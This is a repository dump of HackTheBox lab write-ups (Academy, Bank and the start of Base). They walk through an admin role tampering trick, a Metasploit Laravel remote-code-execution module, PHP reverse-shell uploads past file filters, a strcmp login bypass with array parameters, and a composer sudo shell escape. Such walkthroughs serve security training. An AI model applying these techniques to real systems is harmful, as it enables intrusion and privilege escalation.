├── .gitignore ├── Academy ├── README.md └── pics │ ├── admin_logged_in.png │ ├── admin_php.png │ ├── config_php.png │ ├── dev_staging.png │ ├── htb_academy.png │ ├── icon.png │ ├── metasploit_module.png │ └── register_php.png ├── Bank ├── README.md └── pics │ ├── apache_default.png │ ├── bank_login.png │ ├── chris_login.png │ ├── error.png │ ├── hint.png │ ├── index_php.png │ ├── index_php_req.png │ ├── logo.png │ ├── reverse-shell.png │ ├── support_php.png │ └── upload.png ├── Base ├── README.md └── pics │ ├── login.png │ ├── login_directory.png │ ├── upload_page.png │ ├── uploaded_dir.png │ └── website.png ├── Beep ├── README.md └── pics │ ├── admin_panel.png │ ├── config.png │ ├── logo.png │ ├── vvtiger.png │ └── website.png ├── Blocky ├── README.md └── pics │ ├── logo.png │ ├── notch_credentials.png │ ├── phpmyadmin.png │ ├── phpmyadmin_login.png │ ├── plugin_editor.png │ ├── plugins.png │ ├── reverse_shell.png │ ├── themes_editor.png │ ├── website.png │ ├── wordpress_feedback.png │ └── wp_admin_login.png ├── Devel ├── README.md └── pics │ ├── logo.png │ ├── metasploit.png │ ├── meterpreter.png │ ├── privilege_escalation.png │ ├── reverse_shell.png │ ├── suggester.png │ ├── system_shell.png │ └── welcome.png ├── Doctor ├── README.md └── pics │ ├── admin_post.png │ ├── colorlib.png │ ├── logged_in.png │ ├── login_page.png │ ├── logo.png │ ├── posts_test.png │ ├── root_shell.png │ ├── splunk.png │ ├── splunk_loggedin.png │ ├── ssti_identifcation.png │ └── website.png ├── FindTheEasyPass ├── README.md └── pics │ ├── easypassexe.png │ ├── gj.png │ ├── graph.png │ ├── ida.png │ ├── location.png │ ├── passwordcompare.png │ ├── passwordfunction.png │ ├── registers.png │ └── wrongpassword.png ├── Guard ├── README.md └── pics │ ├── command_more.png │ └── more_trick.png ├── Included ├── README.md └── pics │ ├── etc_passwd.png │ ├── reverse_shell.png │ └── website.png ├── Laboratory ├── README.md └── pics │ ├── dexter_gitlab.png │ ├── dexter_sshkey.png │ ├── etc_passwd.png │ ├── git_logged_in.png │ ├── git_server.png │ ├── help.png │ ├── issue.png │ ├── logo.png │ ├── main_website.png │ ├── move_issue.png │ ├── project.png │ └── vulnerability.png ├── Lame ├── README.md └── pics │ ├── logo.png │ └── searchsploit.png ├── Legacy ├── README.md └── pics │ ├── logo.png │ ├── metasploit_ms08-067.png │ ├── module_options.png │ └── system_shell.png ├── Markup ├── README.md └── pics │ ├── burp-order.png │ ├── delivery.png │ ├── login.png │ ├── order.png │ ├── rootshell.png │ ├── ssh_key_leak.png │ └── xxe_proof.png ├── Mirai ├── README.md └── pics │ ├── admin_website.png │ └── logo.png ├── Oopsie ├── README.md └── pics │ ├── accounting.png │ ├── accounts_uri.png │ ├── apache_website.png │ ├── branding.png │ ├── burpsuite_sitemap.png │ ├── burpsuite_sniper.png │ ├── clients.png │ ├── cookies.png │ ├── hint_login.png │ ├── logged_in.png │ ├── login_page.png │ ├── shell.png │ ├── super_admin_info.png │ ├── upload_shell.png │ ├── uploads.png │ └── uploads_page.png ├── Optimum ├── README.md └── pics │ ├── logo.png │ └── website.png ├── Pathfinder ├── README.md └── pics │ ├── bloodhound-analysis.png │ └── bloodhound_output.png ├── README.md ├── Shield ├── README.md └── pics │ ├── blog.png │ ├── error1.png │ ├── error2.png │ ├── metasploit_filled_options.png │ ├── metasploit_options.png │ ├── metasploit_run.png │ ├── metasploit_search.png │ ├── system_shell.png │ ├── webserver.png │ ├── wordpress.png │ └── wp_login.png ├── Shocker ├── README.md └── pics │ ├── logo.png │ ├── reverse_shell.png │ └── website.png ├── Vaccine ├── README.md └── pics │ ├── apache_server.png │ ├── crackstation.png │ ├── ftp_login.png │ ├── megacorp_car_catalogue.png │ ├── reverse_shell.png │ └── test_sqli.png └── Valentine ├── README.md └── pics ├── apache80.png ├── decoder.png ├── dev.png ├── encoder.png └── logo.png /.gitignore: -------------------------------------------------------------------------------- 1 | ActiveMachines/ 2 | -------------------------------------------------------------------------------- /Academy/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/icon.png) 2 | 3 | # Academy (Linux) 4 | 5 | ## Enumeration 6 | 7 | ``` 8 | PORT STATE SERVICE REASON VERSION 9 | 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 10 | 80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu)) 11 | | http-methods: 12 | |_ Supported Methods: GET HEAD POST OPTIONS 13 | |_http-server-header: Apache/2.4.41 (Ubuntu) 14 | |_http-title: Did not follow redirect to http://academy.htb/ 15 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 16 | ``` 17 | The nmap output already says "Did not follow redirect to http://academy.htb". So let's add the name to our /etc/hosts file, before we start enumeration the webserver. 18 | 19 | ### Examine Port 80 - Apache Webserver 20 | 21 | ![](pics/htb_academy.png) 22 | 23 | We see the homepage of HTB Academy. It has a login and register functionality. But first, let's run gobuster to see if we can find some directories or interesting files: 24 | 25 | ``` 26 | $ gobuster dir -u academy.htb -w /usr/share/wordlists/dirb/big.txt -x php 27 | 28 | /admin.php (Status: 200) 29 | /config.php (Status: 200) 30 | /home.php (Status: 302) 31 | /images (Status: 301) 32 | /index.php (Status: 200) 33 | /login.php (Status: 200) 34 | /register.php (Status: 200) 35 | /server-status (Status: 403) 36 | ``` 37 | 38 | Let's check them one by one: 39 | 40 | Admin.php: login page 41 | ![](pics/admin_php.png) 42 | 43 | Config.php: blank for now - probably interesting once we have access to the server 44 | 45 | ![](pics/config_php.png) 46 | 47 | Home.php - forwards to Login.php: Another login page 48 | 49 | ![](pics/admin_php.png) 50 | 51 | Register.php - Registration form 52 | 53 | ![](pics/register_php.png) 54 | 55 | So let's try to create an account. I used some random value for it. A habbit of mine is to always have Burpsuite in the background, to check some requests. Especially if they are related to registration or login. Intercepting the request with Burpsuite we see following: 56 | 57 | ``` 58 | POST /register.php HTTP/1.1 59 | Host: academy.htb 60 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 61 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 62 | Accept-Language: en-US,en;q=0.5 63 | Accept-Encoding: gzip, deflate 64 | Content-Type: application/x-www-form-urlencoded 65 | Content-Length: 47 66 | Origin: http://academy.htb 67 | DNT: 1 68 | Connection: close 69 | Referer: http://academy.htb/register.php 70 | Cookie: PHPSESSID=blm6cuvmr17s6guk92pik7fcs3 71 | Upgrade-Insecure-Requests: 1 72 | Sec-GPC: 1 73 | 74 | uid=test2&password=test2&confirm=test2&roleid=0 75 | ``` 76 | 77 | You see that roleid? That's weird isnt it? 78 | 79 | ```html 80 |
   Repeat Password 81 | 82 | 83 | 84 | 85 | 86 | ``` 87 | 88 | It's a hidden field in the form. I immediately thought about increasing that roleid to 1 and to try my account for the admin login, as I might be lucky and can control the role of my user with it. And indeed! That works. 89 | 90 | ![](pics/admin_logged_in.png) 91 | 92 | On the TODO list it states two strings "cry0l1t3 / mrb3n", which seem to be either passwords or usernames and the task "Fix issue with dev-staging-01.academy.htb". Probably a subdomain of the box. Let's add it to the `/etc/hosts` file and inspect the website. 93 | 94 | ## Gaining an Initial Foothold 95 | 96 | ![](pics/dev_staging.png) 97 | 98 | It seems to be some kind of logging service. Scrolling through the logs, we can see some SQL credentials (`homestead:secret`). Let's note them down. Maybe we will need them later. 99 | 100 | Scrolling further down, we can see the application name. Apparently it's a Laravel application. 101 | 102 | Hm, never heard of it. Let's do some research on it 103 | 104 | *Laravel is a web application framework with expressive, elegant syntax. Laravel attempts to take the pain out of development by easing common tasks used in the majority of web projects, such as authentication, routing, sessions, and caching.* (https://laravel.com/docs/4.2/introduction) 105 | 106 | A quick google search on Laravel vulnerabilities/exploits reveal a metasploit module `PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)` 107 | 108 | *This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29. Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php. Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY. Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix. In some cases the APP_KEY is leaked which allows for discovery and exploitation.* 109 | 110 | So, for the exploit we only need the APP_KEY. We have seen this one before! It's contained in the log output! 111 | 112 | Fire up msfconsole, use the module and configure it like this: 113 | 114 | ![](pics/metasploit_module.png) 115 | 116 | Now start the exploit and we get a reverse shell! 117 | 118 | ``` 119 | msf6 exploit(unix/http/laravel_token_unserialize_exec) > run 120 | 121 | [*] Started reverse TCP handler on 10.10.14.26:4444 122 | [*] Command shell session 3 opened (10.10.14.26:4444 -> 10.129.83.160:38564) at 2021-01-22 17:00:18 +0100 123 | [*] Command shell session 4 opened (10.10.14.26:4444 -> 10.129.83.160:38566) at 2021-01-22 17:00:18 +0100 124 | 125 | hostname && id 126 | academy 127 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 128 | ``` 129 | 130 | The first thing that we can now check is the `.env` file of the Laravel application. It's located in `/var/www/html/academy`. 131 | 132 | ``` 133 | DB_CONNECTION=mysql 134 | DB_HOST=127.0.0.1 135 | DB_PORT=3306 136 | DB_DATABASE=academy 137 | DB_USERNAME=dev 138 | DB_PASSWORD=mySup3rP4s5w0rd!! 139 | ``` 140 | 141 | Here we see a password. However, we cannot connect to the database with it. So I went to the home directory and tried to login with every user using this password. This was successful with the user `cry0l1t3`. His/Her home directory also contains the user.txt file! 142 | 143 | ## Privilege Escalation 144 | 145 | ### User cry0l1t3 146 | 147 | linpeas tells us that there the audit log files that are only readable by us (adm group) and root. So this is usually a strong hint. So let's check them out. 148 | 149 | *The Linux Audit framework is a kernel feature (paired with userspace tools) that can log system calls. For example, opening a file, killing a process or creating a network connection. These audit logs can be used to monitor systems for suspicious activity* 150 | 151 | So let's see if someone used `su` or `sudo` or some other commands that then require a password input from the user. 152 | 153 | ``` 154 | cry0l1t3@academy:/var/log/audit$ cat * | grep -E -i 'comm="sudo"|comm="su"' 155 | type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A 156 | ``` 157 | 158 | The data looks like hex. Converting it results in `mrb3n_Ac@d3my!`. That's probably the password of the user `mrb3n`. 159 | 160 | ### User mrb3n 161 | 162 | ``` 163 | mrb3n@academy:~$ hostname && id 164 | academy 165 | uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n) 166 | ``` 167 | 168 | Again we run linpeas. Nothing found. 169 | So we check the sudoers list. This time we are able to run `composer` as sudo! 170 | A quick look onto [GTFObins](https://gtfobins.github.io/gtfobins/composer/), reveals that it can be exploited to gain root access. 171 | So let's follow it step by step: 172 | 173 | First: (creates a random directory in /tmp) 174 | ``` 175 | TF=$(mktemp -d) 176 | ``` 177 | Then: (creates a json file containing a scripts object) 178 | ``` 179 | echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json 180 | ``` 181 | And finally: (run composer as root to executing the script) 182 | ``` 183 | sudo composer --working-dir=$TF run-script x 184 | ``` 185 | 186 | And we are root! 187 | ``` 188 | root@academy:/tmp/tmp.BCWVFCDOXp# hostname && id 189 | academy 190 | uid=0(root) gid=0(root) groups=0(root) 191 | ``` 192 | 193 | 194 | 195 | 196 | -------------------------------------------------------------------------------- /Academy/pics/admin_logged_in.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/admin_logged_in.png -------------------------------------------------------------------------------- /Academy/pics/admin_php.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/admin_php.png -------------------------------------------------------------------------------- /Academy/pics/config_php.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/config_php.png -------------------------------------------------------------------------------- /Academy/pics/dev_staging.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/dev_staging.png -------------------------------------------------------------------------------- /Academy/pics/htb_academy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/htb_academy.png -------------------------------------------------------------------------------- /Academy/pics/icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/icon.png -------------------------------------------------------------------------------- /Academy/pics/metasploit_module.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/metasploit_module.png -------------------------------------------------------------------------------- /Academy/pics/register_php.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/register_php.png -------------------------------------------------------------------------------- /Bank/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/logo.png) 2 | 3 | # Bank (Linux) 4 | 5 | ## Enumeration 6 | 7 | ``` 8 | rustscan --ulimit 5000 10.129.29.200 -- -sC -sV -o port_scan 9 | 10 | 11 | PORT STATE SERVICE REASON VERSION 12 | 22/tcp open ssh syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) 13 | 53/tcp open domain syn-ack ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) 14 | | dns-nsid: 15 | |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 16 | 80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu)) 17 | | http-methods: 18 | |_ Supported Methods: OPTIONS GET HEAD POST 19 | |_http-server-header: Apache/2.4.7 (Ubuntu) 20 | |_http-title: Apache2 Ubuntu Default Page: It works 21 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 22 | ``` 23 | 24 | ### Examine Port 80 - Apache2 Server 25 | 26 | ![](pics/apache_default.png) 27 | 28 | When looking at the website, we can only see the Apache2 Default Page. This happens, if you don't modify the `index.html` file in the root directory of apache. It probably means, that we first have to find the correct directory on the webserver. We can do that by using a tool such as gobuster: 29 | 30 | ``` 31 | gobuster dir -w /usr/share/wordlists/dirb/big.txt -u 10.129.29.200 32 | 33 | /.htaccess (Status: 403) 34 | /.htaccess.asp (Status: 403) 35 | /.htpasswd (Status: 403) 36 | /.htpasswd.asp (Status: 403) 37 | /server-status (Status: 403) 38 | ``` 39 | 40 | So no luck with gobuster.... Seems like a dead end. At this point I was super stuck. Been researching things for many hours but without any result for this machine. 41 | 42 | ### Examine Port 52 - DNS Server 43 | 44 | As we got no hint how to proceed on Port 80, let's take a look at the DNS server. We can try a few things with nslookup: 45 | 46 | ``` 47 | > SERVER 10.129.29.200 48 | Default server: 10.129.29.200 49 | Address: 10.129.29.200#53 50 | ``` 51 | 52 | ``` 53 | > 10.129.29.200 54 | ** server can't find 200.29.129.10.in-addr.arpa: NXDOMAIN 55 | ``` 56 | 57 | ``` 58 | > bank.htb 59 | Server: 10.129.29.200 60 | Address: 10.129.29.200#53 61 | 62 | Name: bank.htb 63 | Address: 10.129.29.200 64 | ``` 65 | But this does not give us any additional info, besides the DNS name of the IP, namely `bank.htb`. (this was pretty guessy, but as a HTB player, you should know the naming conventions). Maybe it's some kind of HTTP VirtualHost Routing. 66 | 67 | ### Back to Port 80 - DNS name 68 | 69 | First let's add the DNS server to our `/etc/resolv.conf` file. 70 | 71 | ``` 72 | nameserver 10.129.29.200 73 | ``` 74 | 75 | Now we should be able to access `bank.htb` via the browser. Alternatively, you could also add the IP with the specific name into the `/etc/hosts` file. 76 | 77 | Accessing `http://bank.htb` shows us following: 78 | 79 | ![](pics/bank_login.png) 80 | 81 | We could immediately start bruteforcing the username/password or use SQLMap on it, but let's first enumerate the new website. 82 | 83 | Again we use gobuster for that: 84 | 85 | ``` 86 | gobuster dir -u "http://bank.htb" -w /usr/share/wordlists/dirb/big.txt -x php 87 | 88 | /.htaccess (Status: 403) 89 | /.htaccess.php (Status: 403) 90 | /.htpasswd (Status: 403) 91 | /.htpasswd.php (Status: 403) 92 | /assets (Status: 301) 93 | /inc (Status: 301) 94 | /index.php (Status: 302) 95 | /login.php (Status: 200) 96 | /logout.php (Status: 302) 97 | /server-status (Status: 403) 98 | /support.php (Status: 302) 99 | /uploads (Status: 301) 100 | ``` 101 | 102 | This time, we find several php files (login.php which we already know, logout.php, index.php and support.php), as well as a directory called uploads. This seems suspicious. Let's check out the php files, to see if we can use one to upload something. 103 | 104 | ## Exploitation 105 | 106 | The problem is, that both, support.php and index.php, forward to login.php. However, there is a nice trick to circumvent this by using burpsuite! 107 | 108 | If we send a request to index.php and intercept it with Burp we get this: 109 | 110 | ![](pics/index_php_req.png) 111 | 112 | As response from the server we get following: 113 | 114 | ``` 115 | HTTP/1.1 302 Found 116 | Date: Sun, 17 Jan 2021 14:32:57 GMT 117 | Server: Apache/2.4.7 (Ubuntu) 118 | X-Powered-By: PHP/5.5.9-1ubuntu4.21 119 | Expires: Thu, 19 Nov 1981 08:52:00 GMT 120 | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 121 | Pragma: no-cache 122 | location: login.php 123 | Content-Length: 7322 124 | Connection: close 125 | Content-Type: text/html 126 | ``` 127 | 128 | When we exchange the `302 Found` with `200 OK`, then we can trick our browser to not redirect to the location header `login.php`. As a result we get to see the index.php file: 129 | 130 | ![](pics/index_php.png) 131 | 132 | We can do the same for support.php: 133 | 134 | ![](pics/support_php.png) 135 | 136 | Here we can see the upload functionality that we were looking for! 137 | Let's try to upload a php reverse shell. 138 | 139 | ![](pics/error.png) 140 | 141 | Unfortunately, it tells us that we can only upload images. But there is a nice way to bypass upload filters, if they are not implemented properly. 142 | 143 | After trying some techniques and still not having any success, I took a closer look at the server respone. 144 | 145 | ![](pics/hint.png) 146 | 147 | The source code contains an HTML comment, stating that php files should be named `.htb`, if you wanna upload them for debug purposes. So I renamed my .php file and uploaded it again. This time it worked! 148 | 149 | ![](pics/upload.png) 150 | 151 | Now when clicking on the Attachment link (or accessing the file in the uploads directory), we get a reverse shell as user `www-data`: 152 | 153 | ![](pics/reverse-shell.png) 154 | 155 | Now that we have access to the server, we can obtain the user flag. 156 | 157 | ``` 158 | $ cat user.txt 159 | 872a3bf9df963d168aeb9985f6910e43 160 | ``` 161 | 162 | Afterwards, we have to search for valuable files that help us at escalating privileges. In the directory `/var/www/bank`, I found a file called `bankreports.txt`, that we have not yet seen. 163 | 164 | ``` 165 | +=================+ 166 | | HTB Bank Report | 167 | +=================+ 168 | 169 | ===Users=== 170 | Full Name: Christos Christopoulos 171 | Email: chris@bank.htb 172 | Password: !##HTBB4nkP4ssw0rd!## 173 | CreditCards: 2 174 | Transactions: 8 175 | Balance: 1.337$ 176 | ``` 177 | 178 | Maybe this is the password for the user chris on the machine. Let's try it. 179 | 180 | Unfortunately, it's not working. But we can try it on the login.php website. Maybe we can gain more information there. 181 | 182 | ![](pics/chris_login.png) 183 | 184 | We now have access to Chris' bank account. The problem is that this won't bring us any further. 185 | 186 | So back to enumeration on the webserver... After searching for a while, I found a file called 'user.php' in the directory `/var/www/bank/inc`. 187 | It contains the mysql login details of root: 188 | 189 | ``` 190 | $mysql = new mysqli("localhost", "root", "!@#S3cur3P4ssw0rd!@#", 191 | ``` 192 | 193 | Maybe, root has used the same password for the server. Let's try to login as root. But ... Does not work as well. Seems like a dead end. 194 | 195 | Next step was to check for files with the SUID bit set. 196 | 197 | ``` 198 | $ find / -perm -u=s -type f 2>/dev/null 199 | /var/htb/bin/emergency 200 | /usr/lib/eject/dmcrypt-get-device 201 | /usr/lib/openssh/ssh-keysign 202 | /usr/lib/dbus-1.0/dbus-daemon-launch-helper 203 | /usr/lib/policykit-1/polkit-agent-helper-1 204 | /usr/bin/at 205 | /usr/bin/chsh 206 | /usr/bin/passwd 207 | ``` 208 | 209 | The binary `var/htb/bin/emergency` seemed to be suspicious. It belonged to root and had the SUID bit set. So I executed it and obtained root privileges (still not sure what the purpose of this binary should have been :D). Now we can also get the root flag! 210 | 211 | 212 | Alternatively, we could have also changed the password of root, by manipulating the `/etc/passwd` file, to which we have write permissions. 213 | 214 | ## Post-Exploitation 215 | 216 | Root flag 217 | ``` 218 | # cat root.txt 219 | 833ebe63c00b129b3373c3824f133792 220 | ``` -------------------------------------------------------------------------------- /Bank/pics/apache_default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/apache_default.png -------------------------------------------------------------------------------- /Bank/pics/bank_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/bank_login.png -------------------------------------------------------------------------------- /Bank/pics/chris_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/chris_login.png -------------------------------------------------------------------------------- /Bank/pics/error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/error.png -------------------------------------------------------------------------------- /Bank/pics/hint.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/hint.png -------------------------------------------------------------------------------- /Bank/pics/index_php.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/index_php.png -------------------------------------------------------------------------------- /Bank/pics/index_php_req.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/index_php_req.png -------------------------------------------------------------------------------- /Bank/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/logo.png -------------------------------------------------------------------------------- /Bank/pics/reverse-shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/reverse-shell.png -------------------------------------------------------------------------------- /Bank/pics/support_php.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/support_php.png -------------------------------------------------------------------------------- /Bank/pics/upload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/upload.png -------------------------------------------------------------------------------- /Base/README.md: -------------------------------------------------------------------------------- 1 | # Starting Point - Base 2 | 3 | ## Enumeration 4 | 5 | ``` 6 | $ rustscan 10.10.10.48 -- -sC -sV -o port_scans 7 | 8 | PORT STATE SERVICE REASON VERSION 9 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 10 | | ssh-hostkey: 11 | | 2048 f6:5c:9b:38:ec:a7:5c:79:1c:1f:18:1c:52:46:f7:0b (RSA) 12 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQmgId8Z5lyLG718jzJ9KoLYQPuaKh/Z1++me8L01noJeFuv5RPeqgtoJSeWKcimm7Cw7q3HDUZEHL2LncJIad5v04ma8xgiAG+xUmiO+ntkOff06rtsEx51XRWrbuN4gcTxDCPQQyTJKnTAfleagTbtoWtPNvi82SzaaPyU88nhcn/72USczCeiVfRvawQCcAIHKqUnJzTGlSHAwd6Fj+4sq4CTw0MCrZSTG9JCQmyUVbCFJaF/AtQ0PDOQ/fVhZH8E7E+faAlJKWTYr2sIfQZmC7enT2W82zzWL/JRiQXgAzsI8B6JTJOl3gbmy3+rLY9H+1qztceYKaA8wjFT/5 13 | | 256 65:0c:f7:db:42:03:46:07:f2:12:89:fe:11:20:2c:53 (ECDSA) 14 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3Z4xQdzt1Zxsy5gdOFTrv3k9HtD0UppMhGWFIFWnHZgWAdONjTRzD/ZeiyGeDUgYWGGpQOzl74HXesdUhr+h0= 15 | | 256 b8:65:cd:3f:34:d8:02:6a:e3:18:23:3e:77:dd:87:40 (ED25519) 16 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINbQMzI8ONrv2TFdy0S8PtObPfizkmQ+217qx1pejwce 17 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) 18 | | http-methods: 19 | |_ Supported Methods: POST OPTIONS HEAD GET 20 | |_http-server-header: Apache/2.4.29 (Ubuntu) 21 | |_http-title: Site doesn't have a title (text/html). 22 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 23 | ``` 24 | 25 | We see that two ports are open. Port 80, on which an Apache server is running and ssh on Port 22. 26 | 27 | # Examine Port 80 - Apache Server 28 | 29 | ![](pics/website.png) 30 | 31 | We see a website, with no specific theme or company relation. It's just offering 5 different navigation options, of which only the Login actually works. Clicking on it, we get forwarded to a PHP Login page. 32 | 33 | ![](pics/login.png) 34 | 35 | Instead of trying to bruteforce the login directly, we can start enumerating a bit. What I directly noticed, is, that the URL of the Login is `http://10.10.10.48/login/login.php`. Maybe we can access the parent directory. 36 | 37 | Due to an misconfiguration, we can actually access it! 38 | 39 | ![](pics/login_directory.png) 40 | 41 | And due to another developer mistake, there is still the `swp` file of login.php! This usually happens if the developer edits the file within the directory and then uploads the files to a repository/server without closing the editor first. Let's see if there is any valuable information in that login.php.swp file. Therefore we first download it to our local machine with wget. 42 | 43 | ``` 44 | └──╼ $ file login.php.swp 45 | login.php.swp: Vim swap file, version 8.0 46 | ``` 47 | 48 | Exactly as I thought. The developer used VIM and forgot to close the editor before uploading it. Using `cat`/`more` or `strings` on the file, it reveals the code of the login.php file: 49 | 50 | ```php 51 | if (!empty($_POST['username']) && !empty($_POST['password'])) { 52 | require('config.php'); 53 | if (strcmp($username, $_POST['username']) == 0) { 54 | if (strcmp($password, $_POST['password']) == 0) { 55 | $_SESSION['user_id'] = 1; 56 | header("Location: ../upload.php"); 57 | } else { 58 | print(""); 59 | } 60 | } else { 61 | print(""); 62 | } 63 | } 64 | ``` 65 | The above code checks the username/password combination that the user inputs, against the variables that are stored in config.php to see if they match. The following lines are interesting. 66 | 67 | ```php 68 | if (strcmp($password, $_POST['password']) == 0) { 69 | if (strcmp($username , $_POST['username']) == 0) { 70 | ``` 71 | 72 | The developer is using `strcmp` to check the username and password, which is insecure and can easily be bypassed. This is due to the fact that if strcmp is given an empty array to compare against the stored password, it will return null. In PHP the == operator only checks the value of a variable for equality, and the value of NULL is equal to 0. The correct way to write this would be with the === operator which checks both value and type ([strcmp doc](https://www.php.net/manual/en/function.strcmp.php), [triple equal operator](http://www.dimuthu.org/blog/2008/10/31/triple-equal-operator-and-null-in-php/)). Let's open burp and catch the login request. 73 | 74 | ``` 75 | POST /login/login.php HTTP/1.1 76 | Host: 10.10.10.48 77 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 78 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 79 | Accept-Language: en-US,en;q=0.5 80 | Accept-Encoding: gzip, deflate 81 | Content-Type: application/x-www-form-urlencoded 82 | Content-Length: 27 83 | Origin: http://10.10.10.48 84 | DNT: 1 85 | Connection: close 86 | Referer: http://10.10.10.48/login/login.php 87 | Cookie: PHPSESSID=nvtt5pdb6j01rmv842sp9u0n3a 88 | Upgrade-Insecure-Requests: 1 89 | Sec-GPC: 1 90 | 91 | username=test&password=test 92 | ``` 93 | 94 | Change the POST data as follows to bypass the login: 95 | 96 | ``` 97 | username[]=test&password[]=test 98 | ``` 99 | 100 | This converts the variables to arrays and bypasses strcmp. Once logged in, we see there is additional functionality to upload files. 101 | 102 | ![](pics/upload_page.png) 103 | 104 | Now we simply upload a PHP reverse shell. It succeeds! But where is it uploaded to? Let's start gobuster and search for additional directories. 105 | 106 | ``` 107 | [+] Threads: 10 108 | [+] Wordlist: /usr/share/wordlists/dirb/big.txt 109 | [+] Status codes: 200,204,301,302,307,401,403 110 | [+] User Agent: gobuster/3.0.1 111 | [+] Timeout: 10s 112 | =============================================================== 113 | 2021/01/06 09:54:39 Starting gobuster 114 | =============================================================== 115 | /.htaccess (Status: 403) 116 | /.htpasswd (Status: 403) 117 | /_uploaded (Status: 301) 118 | /login (Status: 301) 119 | /server-status (Status: 403) 120 | /static (Status: 301) 121 | ``` 122 | 123 | There is a directory called `_uploaded`. Let's check this one out. 124 | 125 | ![](pics/uploaded_dir.png) 126 | 127 | Now what's left is to start a nc listener on our local machine and then start our reverse shell by either clicking on the shell.php link or by requesting the file through wget/curl. 128 | 129 | ## Exploitation 130 | 131 | Now that we have a reverse shell, let's see what we can exploit to get access to a user or even root. 132 | 133 | ``` 